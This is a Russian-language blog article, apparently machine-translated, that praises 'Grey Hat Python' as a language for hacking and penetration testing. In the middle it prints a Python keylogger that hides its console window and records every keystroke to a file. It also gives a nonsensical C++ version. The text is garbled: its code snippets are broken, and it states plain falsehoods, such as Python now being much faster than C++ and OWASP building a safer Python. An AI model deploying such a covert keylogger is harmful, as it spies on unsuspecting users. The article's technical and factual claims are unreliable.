Grey Hat Python - Итак, два года назад я занимался исследованиями языков программирования, я начал читать о C, C ++, Assembly, Python и Ruby. Я хотел стать экспертом в кибербезопасности. Итак, я начал учиться столько, сколько смог. Начал с C, C ++ и C # как основы, а после изучения и компиляции множества программ и вирусов я наконец начал изучать Kali Linux. Для тех, кто не знает, что такое Kali Linux, это операционная система для тестирования на проникновение. Итак, я продолжал свои исследования, и я увидел, что большинство программ, вирусов и троянов были скомпилированы на Python, а их основой является Ruby.

Итак, я на время прекратил учебу и начал изучать Python или, точнее, Grey Hat Python и tadaa… Это было чрезвычайно легко по сравнению с C, C # или любым другим языком, который я выучил. Я наконец-то узнал, почему Python был наиболее используемым языком и как он стал известным.
Итак, сегодня я буду обсуждать, как Python превратился в Grey Hat Python и почему он так широко используется, что даже Google и YouTube используют его в своей базе данных для предоставления максимально точных результатов поиска.

Начиная с Python, это язык программирования высокого уровня, что означает, что его синтаксисы чрезвычайно легко читаются даже для начинающих. Если вы новичок в программировании, то с этого языка я бы предложил вам начать. Позволь мне привести пример:

Вот как это выглядит в C:

#include

int main()
(
printf("Hello world\n");
return 0;
)

Вот как это выглядит в Java:

class HelloWorld
(
public static void main (String args())
(
System.out.println ("Hello World");
)
)

И вот как это выглядит в Python (v2.7)

print "Hello World"

Просто? Да, это так. Итак, Python был не только простым в написании и понимании, но и очень компактным. Итак, вы можете быть удивлены, как это привело к Grey Hat Python?

Рекомендуемые курсы

  • Обучение IP-маршрутизации
  • Учебный курс по взлому
  • Полное обучение RMAN
  • Обучение программированию на Python

Питон против Серой Шляпы Питон

Итак, что же такое Grey Hat Python? Почему он так отличается от нашего обычного Python? Дело в том, что Grey Hat Python - это не что иное, как программы, написанные на Python хакерами, тестерами Network-Stress и реверс-инженерами для создания или взлома программы. Но термин Grey Hat используется потому, что это не совсем полезное или пользовательское программное обеспечение. Он используется для защиты или создания программного обеспечения, нарушающего безопасность.

Его можно легко использовать для тестирования ограничений безопасной среды или для взлома безопасной среды. Вот что значит Серая Шляпа. И это гораздо проще сделать в Python, чем в C, C ++ или Java. Так называется Grey Hat Python. Вот несколько примеров, которые я могу вспомнить:

• Написание кейлоггеров (для хакеров и пентестеров)
• Написание сценариев оболочки безопасности (для сетевых администраторов)
• Написание автоматической IDS (системы обнаружения вторжений для инженеров по безопасности)

Итак, теперь вы знаете, почему и чем полезен Grey Hat Python. Чтобы уточнить это, позвольте мне привести несколько подробных примеров.
Возможно, вы слышали о Google App Engine. Google App Engine изначально разрабатывался на Python, прежде чем был перенесен на него. Google App является хорошим примером программы, написанной на Python, поскольку она позволяет создавать веб-приложения с использованием богатой коллекции библиотек, инструментов и инфраструктуры.

Когда-нибудь задумывались, почему так легко искать что-то в Google? Большую часть времени вы получаете результаты поиска, которые на 80% точны. Это связано с тем, что Python чрезвычайно гибок, работает на высокой скорости, а базы данных гораздо компактнее, хотя в нем хранится «n» количество информации. Python настолько расширяем, что даже YouTube использует его для таких целей, как просмотр видео, управление шаблонами, администрирование видео, доступ к каноническим данным и многое другое.

У Google есть свои сканеры и пауки, которые собирают данные, как только они загружены в Интернет, независимо от того, где и насколько они безопасны. Нужно только хорошее вдохновение, время и знания, чтобы собрать эту информацию.

Поиски в Google ранее были основаны на Python, который впоследствии был изменен на C ++ для оптимизации скорости, потому что сканеры Google сканируют много страниц в секунду, и каждая из них занимает несколько минут для успешного сканирования. Python в настоящее время намного быстрее, чем C ++, но это было не так несколько десятилетий назад.

Была известная цитата, цитируемая Google:
«Python, где мы можем, C ++, где мы должны».

Таким образом, вы можете быть удивлены, как это можно использовать для взлома, тестирования и сетевой безопасности. Позволю себе не согласиться. Если бы вы могли создать программу, которая на 70-80% точна в предоставлении эффективных результатов поиска, то вы, вероятно, могли бы создать приложение, которое может подключаться к веб-сайтам, осуществлять интеллектуальный поиск и создавать профиль человека, который, скорее всего, будет использоваться отдельными черными шляпами. в злонамеренных целях. Оставьте людей в стороне, один, если он достаточно умен, может легко создать приложение для построения профиля компании, целого дерева от его корня до всего, что вы можете себе представить…

Сбор информации через Maltego

Вы можете подумать, что я немного преувеличиваю. Нет, я НЕ!

Подумайте о примерах, подобных Мальтего Maltego - это программное обеспечение, или я могу лучше перефразировать его как криминалистическое приложение с открытым исходным кодом, созданное для сбора информации и формирования профиля людей, компаний и других корпоративных агентств.

Нужно просто ввести правильные данные в приложение, а все остальное, например, связывание электронной почты, людей, групп людей, даже определение интернет-инфраструктуры, такой как домены, DNS-имена, сетевые блоки и IP-адреса, можно связать и соединить с помощью этого открытого источника.,

Для получения дополнительной информации посетите, чтобы узнать, что такое Maltego?

Таким образом, если доступ к «Секретной информации» определяет ваш успех, тогда Maltego может помочь вам обнаружить ее. Maltego частично написан на Python и также использует Java, который снова является отличным языком.

Столько цитат о безопасности от Google. Точнее говоря, Google - это наименьший способ сохранить анонимность в Интернете, независимо от того, используете ли вы incognito или www.duckduckgo.com из Chrome. Потому что в конечном итоге все обновляется в Интернете. Суть в том, что дело не в неуязвимости, а в том, чтобы быть абсолютно уязвимым. Нельзя полностью стереть себя полностью из Интернета. Но, безусловно, можно попытаться сохранить как можно меньше информации в Интернете.

Python - это не просто язык, это язык сценариев. Языки сценариев позволяют писать, изменять свои собственные инструменты, когда вам нужно что-то более индивидуальное. Эти инструменты сетевой безопасности сильно зависят от языка сценариев для расширяемости. Например, давайте возьмем Scapy.

Scapy написан исключительно на Python. Это мощный интерактивный инструмент для работы с пакетами. Он может генерировать поддельные пакеты самостоятельно, сканировать сети и даже может прослушивать пакеты в сети.

Найти подробную информацию о том, что такое Scapy?

Теперь это сложные программы, написанные опытными программистами. Давайте посмотрим, как просто написать программу на Python, которую могут легко понять люди, которые имеют некоторые хорошие основы в программировании.

Это кейлоггер, написанный на Python:

#!/usr/bin/Python
import pyHook
import Pythoncom
import win32gui
import win32console
log_file = "log_file.txt" #name of log file
window = win32console. GetConsoleWindow() #go to script window
win32gui.ShowWindow (window, 0) #hide window
def pressed_chars(event): #on key pressed function
if event.Ascii:
f = open(log_file, "a") # (open log_file in append mode)
char = chr (event.Ascii) # (insert real char in variable)
if char == "q": # (if char is q)
f.close() # (close and save log file)
exit() # (exit program)
if event.Ascii == 13: # (if char is "return")
f.write("\n") # (new line)
f.write(char) # (write char)

proc = pyHook.HookManager() #open pyHook
proc.KeyDown = pressed_chars #set pressed_chars function on KeyDown event
proc.HookKeyboard() #start the function
Pythoncom.PumpMessages() #get input

Итак, это гораздо более, чем просто, если вы спросите меня. Я просто добавил модули pyhook, Pythoncom, win32gui и win32console, которые вы можете легко загрузить с веб-сайта sourceforge, и я упомянул комментарии, используя хэш-тег. Но если мне придется написать ту же программу на C ++, давайте посмотрим, насколько это может быть сложно.

Это программа, написанная на C ++: -

 #include #include #include #include int main(int argc, char ** agrv)( using namepace std; /*Easier*/ char std::vector input_STRUCT = ("S", "T", "O"); char std::vector input_STRUCT_1 = ("P", ""); char std::vector input_STRUCT_2 = ("L", "O", "O", "K", "I", "N", "G"); char std::vector input_STRUCT_3 = ("", "F", "O", "R"); char std::vector input_STRUCT_4 = ("M", "A", "L", "W"); char std::vector input_STRUCT_5 = ("A", "R", "E"); ostream os("C:\users\keylogger.txt"); int i; for( i = 0; i <=2; i++)( os << input_STRUCT(i); for(;i <= 1000000 ;i++)( ) ) for( i=0; i<=1;i++)( os << input_STRING_1(i); for(;i <= 1000000 ;i++)( ) ) for(i=0; i<=6; i++) ( os << input_STRING_2 (i); for(; i <= 1000000 ; i++)( ) for(i=0; i<=3;i++)( os << input_STRING_3(i); for(; i <= 1000000 ;i++)( ) ) for(i=0; i<=3; i++)( os << input_STRING_4(i); for(;i <= 1000000 ; i++)( ) ) for(i=0; i<=2; i++)( os << input_STRING_5(i); for(;i <= 1000000 ; i++)( ) ) os.close(); istream is (" C:\users\keylogger.txt "); cout << is; return 0; )

Итак, это довольно большой по сравнению с Python. И если мы говорим об эффективности, то Python может быть легко скомпилирован в исполняемый файл без каких-либо усилий с помощью программного обеспечения py2exe. Если говорить о C ++, то, честно говоря, этот код - шутка. Чтобы написать правильный регистратор ключей, нужно написать DLL, которая реализует хук WH_KEYBOARD. Кроме того, этот код совсем не прост для понимания новичком.

Взлом открытого кода

Теперь об этом заботятся хакеры Black Hat, а точнее, люди, которые намереваются уничтожать, манипулировать данными для своих собственных нужд. Говоря о соображениях безопасности, Python также полезен для хакеров White Hat, которые намерены спасти общество от атак злоумышленников. Если вы хотите начать карьеру или, по крайней мере, хотите изучать Python для исследований в области безопасности, то вы наверняка сможете углубиться в OWASP, BRO или Quick NIX Secure Script.

OWASP - открытый проект безопасности веб-приложений. Цель OWASP - создать более безопасную версию Python, которая позволит специалистам по безопасности и разработчикам писать программы, менее подверженные атакам хакеров. Это связано с анализом «черного ящика», выявлением и решением проблем безопасности, которые могут повлиять на интерактивный интерпретатор Python.

BRO - это программа мониторинга сетевой безопасности и трафика, тогда как Quick NIX используется для повышения безопасности владения файлами на лету.

Поскольку мы говорим о безопасности, давайте поговорим об операционной системе, которая частично основана на Python. Python отлично работает с UNIX, LINUX и Debian. Одной из самых известных операционных систем была Backtrack 5. Были выпущены разные версии. Он был специально разработан для PenTesting. Позже люди из Offensive Security подумали, что Backtrack требуется перезагрузка, потому что большинство инструментов либо не работают должным образом, либо не поддерживаются.

Позже они выпустили Kali Linux, полностью основанный на Debian. И большая часть его фреймворка либо на Ruby, либо на Python. Ruby также является отличным скриптовым языком. Но я бы в любое время предпочел бы Python, а не Python, потому что у Python есть более разнообразное сообщество с Linux и его более прямое и простое в отладке. Несмотря на то, что Ruby обладает множеством функций и быстро адаптируется к окружающей среде, его сложно отладить, сложно прочитать и он более сложен, чем Python.

Лучший пример - сравнение Apple с Linux или Сравнение iphone с Android. Apple богата ресурсами, очень гладкая и более пристрастна к новичкам. В то время как Linux / Android более дружественен к пользователю, немного отстает и иногда может быть головной болью, если вы не знаете, как его настроить или поддерживать.

Есть даже книга, основанная на Python Grey Hat Hacking Джастина Зейтца. Он занимается, в частности, автоматизацией трудоемких задач реверс-инжиниринга и обеспечения безопасности, разработкой собственного отладчика, внедрением библиотек и DLL, отслеживанием безопасного трафика в зашифрованном сеансе и использованием отладчика Immunity, Sulley и многих других. Это потрясающая книга, не имеет значения, новичок вы или эксперт, вы всегда будете учиться тому или иному при каждом прочтении.

Вывод

Так что, если вы новичок, Python будет для вас правильным выбором в качестве первого языка тестирования безопасности программирования.

Просто запомните одну вещь: в конце концов Grey Python - это не просто язык, это способ сделать все правильно и быстро.

Первый источник изображения: pixabay.com

Статьи по Теме:-

Вот несколько статей, которые помогут вам получить более подробную информацию о Grey Hat Python, так что просто перейдите по ссылке.

  1. Преимущества инструментов кибербезопасности, о которых вы должны знать
  2. Карьера в Python
  3. Лучшие 25 удивительных вопросов и ответов на Python Interview
  4. Каковы преимущества и ограничения использования Python?
  5. Python против Node.js
  6. Руководство по вопросам интервью по кибербезопасности
  7. Различные типы инструментов для тестирования безопасности

Категория:

Разработка программного обеспечения